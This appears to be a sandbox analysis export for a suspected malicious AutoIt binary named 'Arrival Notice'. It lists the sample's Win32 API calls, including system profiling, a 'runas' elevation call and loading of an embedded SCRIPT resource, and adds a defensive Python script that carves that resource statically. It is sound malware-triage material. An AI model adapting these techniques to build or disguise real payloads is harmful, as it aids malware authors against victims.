                  [Control-flow graph of the sample's main module (base 003B0000), exported by the Joe Sandbox IDA plugin as a raw node/edge list and not reproduced here. Win32 API nodes present in this fragment: GetModuleHandleW, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, GetStartupInfoW, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, EnterCriticalSection, LeaveCriticalSection, SetEvent, ResetEvent, PostQuitMessage, DefWindowProcW, SetTimer, KillTimer, RegisterWindowMessageW, CreatePopupMenu, MoveWindow, SetFocus, Shell_NotifyIconW, DeleteObject, DestroyWindow, DestroyIcon, LoadStringW, SystemParametersInfoW, GetOpenFileNameW, GetLongPathNameW, GetForegroundWindow, ShellExecuteW, SetCurrentDirectoryW, CreateWindowExW, ShowWindow, CreateFileW, GetFileType, GetLastError, CloseHandle, GetStdHandle, OleInitialize, InitializeCriticalSectionAndSpinCount, InterlockedExchange, DuplicateHandle, CreateThread. CRT/runtime labels on the same edges: __onexit, __wsopen_s, __fread_nolock, ___scrt_fastfail, __dosmaperr, ___std_exception_copy, try_get_first_available_module.]

                  Control-flow Graph

                  [Edge list for the function at 003B42DE-003B44A6 (with out-of-line blocks at 003F3617-003F3828) omitted; the API nodes it carries are the calls listed under APIs below.]
                  APIs
                  • GetVersionExW.KERNEL32(?), ref: 003B430D
                    • Part of subcall function 003B6B57: _wcslen.LIBCMT ref: 003B6B6A
                  • GetCurrentProcess.KERNEL32(?,0044CB64,00000000,?,?), ref: 003B4422
                  • IsWow64Process.KERNEL32(00000000,?,?), ref: 003B4429
                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 003B4454
                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 003B4466
                  • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 003B4474
                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 003B447B
                  • GetSystemInfo.KERNEL32(?,?,?), ref: 003B44A0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                  • String ID: GetNativeSystemInfo$kernel32.dll$|O
                  • API String ID: 3290436268-3101561225
                  • Opcode ID: fb6afc86f10cd314af2438d0f3540c71f04a50cc95adc731235c8e0c21f6a10b
                  • Instruction ID: 5b2fc0e6cc5044b6aaa330fccfc1a6457252c896a7d5eb48b225613f71141f32
                  • Opcode Fuzzy Hash: fb6afc86f10cd314af2438d0f3540c71f04a50cc95adc731235c8e0c21f6a10b
                  • Instruction Fuzzy Hash: D7A1B17590A2C4DFE713C76A78805ED3FAC6B26704B084CBFD98193E32D260465ACB2D

                  Control-flow Graph

                  [Edge list for the function at 003B42A2-003B42DD (with out-of-line blocks at 003F35BA-003F3612) omitted; the API nodes it carries are the calls listed under APIs below.]
                  APIs
                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,003B50AA,?,?,00000000,00000000), ref: 003B42B2
                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,003B50AA,?,?,00000000,00000000), ref: 003B42C9
                  • LoadResource.KERNEL32(?,00000000,?,?,003B50AA,?,?,00000000,00000000,?,?,?,?,?,?,003B4F20), ref: 003F35BE
                  • SizeofResource.KERNEL32(?,00000000,?,?,003B50AA,?,?,00000000,00000000,?,?,?,?,?,?,003B4F20), ref: 003F35D3
                  • LockResource.KERNEL32(003B50AA,?,?,003B50AA,?,?,00000000,00000000,?,?,?,?,?,?,003B4F20,?), ref: 003F35E6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                  • String ID: SCRIPT
                  • API String ID: 3051347437-3967369404
                  • Opcode ID: ab4052212b53f600a470cd5c4531274caa398e7809eb4599187c3fde3aff0681
                  • Instruction ID: 5323dd3555493027895ed02914f321e4ac407d9fa15725b73f6070d71bc69063
                  • Opcode Fuzzy Hash: ab4052212b53f600a470cd5c4531274caa398e7809eb4599187c3fde3aff0681
                  • Instruction Fuzzy Hash: B711EC34201300BFE7228FA5DC89F637BB9EBC6B01F244569B5028A660DBB0D8009664
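                  The call sequence in this function (CreateStreamOnHGlobal, then FindResourceExW with type 0000000A = RT_RCDATA and name SCRIPT, followed by LoadResource, SizeofResource and LockResource) is how a compiled AutoIt stub locates the script embedded in its own resources. The example below is added here for triage and is not code from the sample, from AutoIt or from Joe Sandbox: it ports the same type -> name -> language lookup to pure Python so the resource can be carved from the file on disk without running it. The PE and the resource tree it runs on are constructed inline (the helper names build_sample_rsrc, build_sample_pe and carve_autoit_script are ours). The carved blob is the packed AutoIt script, not source; decompiling it is a separate step this code does not attempt.

```python
"""Carve the RT_RCDATA "SCRIPT" resource of a compiled AutoIt binary.

Offline equivalent of FindResourceExW(hModule, 0x0A, L"SCRIPT", 0) followed by
LoadResource/SizeofResource/LockResource: walks the PE resource directory
(type -> name -> language) and returns the data entry's bytes."""
import struct

RT_RCDATA = 10            # 0000000A, the type argument in the FindResourceExW call
HIGH_BIT = 0x80000000     # on Name: offset to a string; on OffsetToData: sub-directory


def _dir_entries(rsrc: bytes, off: int):
    """Yield (name_field, data_field) pairs of one IMAGE_RESOURCE_DIRECTORY."""
    named, ids = struct.unpack_from("<HH", rsrc, off + 12)
    for i in range(named + ids):
        yield struct.unpack_from("<II", rsrc, off + 16 + 8 * i)


def _entry_id(rsrc: bytes, name_field: int):
    """Integer ID, or the upper-cased UTF-16 IMAGE_RESOURCE_DIR_STRING_U name."""
    if name_field & HIGH_BIT:
        off = name_field & 0x7FFFFFFF
        (length,) = struct.unpack_from("<H", rsrc, off)
        return rsrc[off + 2: off + 2 + 2 * length].decode("utf-16-le").upper()
    return name_field


def find_resource(rsrc: bytes, rsrc_rva: int, type_id, name):
    """First matching resource (any language), like FindResourceExW; None if absent."""
    want = name.upper() if isinstance(name, str) else name   # names are case-insensitive
    for t_name, t_data in _dir_entries(rsrc, 0):
        if _entry_id(rsrc, t_name) != type_id or not t_data & HIGH_BIT:
            continue
        for n_name, n_data in _dir_entries(rsrc, t_data & 0x7FFFFFFF):
            if _entry_id(rsrc, n_name) != want or not n_data & HIGH_BIT:
                continue
            for _lang, l_data in _dir_entries(rsrc, n_data & 0x7FFFFFFF):
                if l_data & HIGH_BIT:
                    continue                      # malformed: a fourth directory level
                data_rva, size = struct.unpack_from("<II", rsrc, l_data)
                start = data_rva - rsrc_rva       # OffsetToData is an RVA, not a file offset
                if 0 <= start and start + size <= len(rsrc):
                    return bytes(rsrc[start:start + size])
    return None


def rsrc_section(pe: bytes):
    """Return (.rsrc raw bytes, .rsrc VirtualAddress) from a PE file image."""
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    nsections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size              # section table follows the optional header
    for i in range(nsections):
        name, _vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", pe, table + 40 * i)
        if name.rstrip(b"\0") == b".rsrc":
            return pe[rawptr:rawptr + rawsize], va
    raise ValueError("no .rsrc section")


def carve_autoit_script(pe: bytes):
    """The stub's lookup, done statically: RT_RCDATA / "SCRIPT" / first language."""
    rsrc, va = rsrc_section(pe)
    return find_resource(rsrc, va, RT_RCDATA, "SCRIPT")


def build_sample_rsrc(script: bytes, rsrc_rva: int) -> bytes:
    """Constructed test input: a minimal .rsrc tree RT_RCDATA -> "SCRIPT" -> lang 0."""
    name16 = "SCRIPT".encode("utf-16-le")
    ROOT, TYPE_DIR, NAME_DIR, DATA_ENT, NAME_STR = 0x00, 0x18, 0x30, 0x48, 0x58
    DATA = (NAME_STR + 2 + len(name16) + 7) & ~7           # 8-byte aligned payload
    buf = bytearray(DATA + len(script))

    def put_dir(off, named, ids):
        struct.pack_into("<IIHHHH", buf, off, 0, 0, 0, 0, named, ids)

    put_dir(ROOT, 0, 1);     struct.pack_into("<II", buf, ROOT + 16, RT_RCDATA, HIGH_BIT | TYPE_DIR)
    put_dir(TYPE_DIR, 1, 0); struct.pack_into("<II", buf, TYPE_DIR + 16, HIGH_BIT | NAME_STR, HIGH_BIT | NAME_DIR)
    put_dir(NAME_DIR, 0, 1); struct.pack_into("<II", buf, NAME_DIR + 16, 0, DATA_ENT)
    struct.pack_into("<IIII", buf, DATA_ENT, rsrc_rva + DATA, len(script), 0, 0)
    struct.pack_into("<H", buf, NAME_STR, len("SCRIPT"))
    buf[NAME_STR + 2:NAME_STR + 2 + len(name16)] = name16
    buf[DATA:DATA + len(script)] = script
    return bytes(buf)


def build_sample_pe(rsrc: bytes, rsrc_rva: int) -> bytes:
    """Constructed test input: MZ/PE headers with one section (.rsrc) at file offset 0x200."""
    pe = bytearray(0x200 + len(rsrc))
    pe[0:2] = b"MZ"
    struct.pack_into("<I", pe, 0x3C, 0x40)                          # e_lfanew
    pe[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", pe, 0x44, 0x14C, 1, 0, 0, 0, 0, 0)  # COFF: 1 section, no opt. header
    struct.pack_into("<8sIIII", pe, 0x44 + 20, b".rsrc", len(rsrc), rsrc_rva, len(rsrc), 0x200)
    pe[0x200:] = rsrc
    return bytes(pe)


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else \
        build_sample_pe(build_sample_rsrc(b"constructed SCRIPT resource payload", 0x4C000), 0x4C000)
    blob = carve_autoit_script(data)
    print("no SCRIPT resource" if blob is None else f"SCRIPT resource: {len(blob)} bytes, head {blob[:8]!r}")
```

                  Run it as `python carve.py "Arrival Notice.exe"` against a copy of the sample; with no argument it exercises the constructed PE instead. A missing SCRIPT resource does not rule out AutoIt (older stubs appended the script to the end of the file instead), and a present one only tells you the stub's payload exists, not what it does.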

                  Control-flow Graph

                  APIs
                  • SetCurrentDirectoryW.KERNEL32(?), ref: 003B2B6B
                    • Part of subcall function 003B3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00481418,?,003B2E7F,?,?,?,00000000), ref: 003B3A78
                    • Part of subcall function 003B9CB3: _wcslen.LIBCMT ref: 003B9CBD
                  • GetForegroundWindow.USER32(runas,?,?,?,?,?,00472224), ref: 003F2C10
                  • ShellExecuteW.SHELL32(00000000,?,?,00472224), ref: 003F2C17
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                  • String ID: runas
                  • API String ID: 448630720-4000483414
                  • Opcode ID: 8e5af11df17626a785baa5bed551e969f4d4b510872659b4311dd536ff723142
                  • Instruction ID: 6b85da78b2e6d2485c4f27e910973860778bc14d57ef1c9b565e79f550123ba6
                  • Opcode Fuzzy Hash: 8e5af11df17626a785baa5bed551e969f4d4b510872659b4311dd536ff723142
                  • Instruction Fuzzy Hash: 6111D6712083056AC707FF60D892AFF7BA89F91708F54592EF7465B4A3CF248A4AC716
                  APIs
                  • lstrlenW.KERNEL32(?,003F5222), ref: 0041DBCE
                  • GetFileAttributesW.KERNELBASE(?), ref: 0041DBDD
                  • FindFirstFileW.KERNELBASE(?,?), ref: 0041DBEE
                  • FindClose.KERNEL32(00000000), ref: 0041DBFA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: FileFind$AttributesCloseFirstlstrlen
                  • String ID:
                  • API String ID: 2695905019-0
                  • Opcode ID: 7eab7e6d7fc6e44b70f86fc92fc7becefae182cf7b8258cc5cdf7a7124f0e1f6
                  • Instruction ID: 3f4d11eae0f3e58fc1997c2756cf650c3f78f84580ffb67212d5664481580df7
                  • Opcode Fuzzy Hash: 7eab7e6d7fc6e44b70f86fc92fc7becefae182cf7b8258cc5cdf7a7124f0e1f6
                  • Instruction Fuzzy Hash: D5F0A078C119105782206B78AC4D8EB376CAE02334B184B53F936C21E0FBF45995C6DE
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: BuffCharUpper
                  • String ID: p#H
                  • API String ID: 3964851224-1830686593
                  • Opcode ID: 57dcc4a95ceeaba0b0c3a1183d1a1f96b327be9a643c39b67a6ebc6fb4d1959c
                  • Instruction ID: 179d78a03901fe86851f3fee2ab932a668e5b52c1e35f762dc95ef1e64b0fd4f
                  • Opcode Fuzzy Hash: 57dcc4a95ceeaba0b0c3a1183d1a1f96b327be9a643c39b67a6ebc6fb4d1959c
                  • Instruction Fuzzy Hash: F2A28C70608301CFD721DF28C480B6AB7E5BF89308F14986EE99A9B752D775EC45CB92
                  APIs
                  • GetInputState.USER32 ref: 003BD807
                  • timeGetTime.WINMM ref: 003BDA07
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003BDB28
                  • TranslateMessage.USER32(?), ref: 003BDB7B
                  • DispatchMessageW.USER32(?), ref: 003BDB89
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003BDB9F
                  • Sleep.KERNEL32(0000000A), ref: 003BDBB1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                  • String ID:
                  • API String ID: 2189390790-0
                  • Opcode ID: eb6e3814f7df34769c77fc2ea6c500d525ffe8c0765d53d3fee6d13c8ab9d84b
                  • Instruction ID: 473c1122c680876b700409ac2f77731ceee886fdd59d2deba918875d1a298723
                  • Opcode Fuzzy Hash: eb6e3814f7df34769c77fc2ea6c500d525ffe8c0765d53d3fee6d13c8ab9d84b
                  • Instruction Fuzzy Hash: 2042F670608341EFD72ACF24C888BAAB7E4BF45308F14456EE556976D1E7B4E844CF86

                  Control-flow Graph

                  APIs
                  • GetSysColorBrush.USER32(0000000F), ref: 003B2D07
                  • RegisterClassExW.USER32(00000030), ref: 003B2D31
                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003B2D42
                  • InitCommonControlsEx.COMCTL32(?), ref: 003B2D5F
                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003B2D6F
                  • LoadIconW.USER32(000000A9), ref: 003B2D85
                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 003B2D94
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                  • API String ID: 2914291525-1005189915
                  • Opcode ID: d1eedee01c3e8a6f5ce2c28928b26b3c5a453293a34b446ddeb8e0319c479469
                  • Instruction ID: 15d6e09efbd5cd9eb5313c07cbda070cd96fbe65d060be0488eb6c57a3234074
                  • Opcode Fuzzy Hash: d1eedee01c3e8a6f5ce2c28928b26b3c5a453293a34b446ddeb8e0319c479469
                  • Instruction Fuzzy Hash: 0A21F7B5902309AFDB40DFE4EC89BDDBBB8FB09700F04452AF511A62A0D7B50541CF98

                  Control-flow Graph

                  • Graph root block: 003E8D45 (rendered graph and node/edge list not reproduced)
                  • API call sites on the graph: GetConsoleMode (003E8FCC), ReadConsoleW (003E8FE3), ReadFile (003E902D), GetLastError (003E8FFF, 003E90A1); none of these appear in an APIs list for this record
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID:
                  • String ID: .=
                  • API String ID: 0-4056814303
                  • Opcode ID: 3abb24b6545849b6b4b904187a217a6b09bafa0f056fc087ad1caac1cb901455
                  • Instruction ID: 02967e5ec887cc0f561052a4c11f124b1c8971f5b0ead1dac390cb9fde2bd79c
                  • Opcode Fuzzy Hash: 3abb24b6545849b6b4b904187a217a6b09bafa0f056fc087ad1caac1cb901455
                  • Instruction Fuzzy Hash: 8BC11675D042A99FCB13DFAAD841BADBBB4AF09310F05469AF519AB3D2C7308D41CB60

                  Control-flow Graph

                  • Graph root block: 003F065B (rendered graph and node/edge list not reproduced)
                  • API call sites on the graph: GetFileType (003F0781), GetLastError (003F0756, 003F078C, 003F0931), CloseHandle (003F078C-003F07BD block, 003F08FC); CreateFileW is reached through the subcall to 003F039A listed below
                  APIs
                    • Part of subcall function 003F039A: CreateFileW.KERNELBASE(00000000,00000000,?,003F0704,?,?,00000000,?,003F0704,00000000,0000000C), ref: 003F03B7
                  • GetLastError.KERNEL32 ref: 003F076F
                  • __dosmaperr.LIBCMT ref: 003F0776
                  • GetFileType.KERNELBASE(00000000), ref: 003F0782
                  • GetLastError.KERNEL32 ref: 003F078C
                  • __dosmaperr.LIBCMT ref: 003F0795
                  • CloseHandle.KERNEL32(00000000), ref: 003F07B5
                  • CloseHandle.KERNEL32(?), ref: 003F08FF
                  • GetLastError.KERNEL32 ref: 003F0931
                  • __dosmaperr.LIBCMT ref: 003F0938
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                  • String ID: H
                  • API String ID: 4237864984-2852464175
                  • Opcode ID: d0be4ea0e2fbdde9e224ad5bb158eab203c8c0044f8cfa373824d2b9ce76aa7d
                  • Instruction ID: a9ef9c934229d90c5157f6480d61881797d3bbf33fc96dc6f916de6994adfd33
                  • Opcode Fuzzy Hash: d0be4ea0e2fbdde9e224ad5bb158eab203c8c0044f8cfa373824d2b9ce76aa7d
                  • Instruction Fuzzy Hash: ADA11436A101088FDF1EAF6CD891BBE7BA0AB06320F14415EF9159F3A2D7719916CB91

                  Control-flow Graph

                  APIs
                    • Part of subcall function 003B3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00481418,?,003B2E7F,?,?,?,00000000), ref: 003B3A78
                    • Part of subcall function 003B3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 003B3379
                  • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 003B356A
                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 003F318D
                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 003F31CE
                  • RegCloseKey.ADVAPI32(?), ref: 003F3210
                  • _wcslen.LIBCMT ref: 003F3277
                  • _wcslen.LIBCMT ref: 003F3286
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                  • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                  • API String ID: 98802146-2727554177
                  • Opcode ID: b8a01eb86dbd98b6405d9b113f8d55a009083e15a08346f9f448f705a23bce8b
                  • Instruction ID: 582f6a0cfcfecf44feb6e444848684ace1cf0eb4a62e3acc95749bed41bf8b7d
                  • Opcode Fuzzy Hash: b8a01eb86dbd98b6405d9b113f8d55a009083e15a08346f9f448f705a23bce8b
                  • Instruction Fuzzy Hash: 27719D71405304AEC316EF65ED929AFBBE8FF85344F40083EFA4587161EB749A48CB5A

                  Control-flow Graph

                  APIs
                  • GetSysColorBrush.USER32(0000000F), ref: 003B2B8E
                  • LoadCursorW.USER32(00000000,00007F00), ref: 003B2B9D
                  • LoadIconW.USER32(00000063), ref: 003B2BB3
                  • LoadIconW.USER32(000000A4), ref: 003B2BC5
                  • LoadIconW.USER32(000000A2), ref: 003B2BD7
                  • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 003B2BEF
                  • RegisterClassExW.USER32(?), ref: 003B2C40
                    • Part of subcall function 003B2CD4: GetSysColorBrush.USER32(0000000F), ref: 003B2D07
                    • Part of subcall function 003B2CD4: RegisterClassExW.USER32(00000030), ref: 003B2D31
                    • Part of subcall function 003B2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003B2D42
                    • Part of subcall function 003B2CD4: InitCommonControlsEx.COMCTL32(?), ref: 003B2D5F
                    • Part of subcall function 003B2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003B2D6F
                    • Part of subcall function 003B2CD4: LoadIconW.USER32(000000A9), ref: 003B2D85
                    • Part of subcall function 003B2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 003B2D94
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                  • String ID: #$0$AutoIt v3
                  • API String ID: 423443420-4155596026
                  • Opcode ID: 513e7b3ae7ec8c8ffadf6b14d66f149358f51c477e68e65debb64d816479b7c9
                  • Instruction ID: b335842fefd77959cdc2b8c8cfc79e94de38fb7863db81edee2a3fcf34b3de84
                  • Opcode Fuzzy Hash: 513e7b3ae7ec8c8ffadf6b14d66f149358f51c477e68e65debb64d816479b7c9
                  • Instruction Fuzzy Hash: 16211A74E01314ABEB109FA5EC95A9D7FB8FB48B50F04443FEA01A6AB0D7B50541CF98
                  APIs
                  • __Init_thread_footer.LIBCMT ref: 003BBB4E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Init_thread_footer
                  • String ID: p#H$p#H$p#H$p#H$p%H$p%H$x#H$x#H
                  • API String ID: 1385522511-51995042
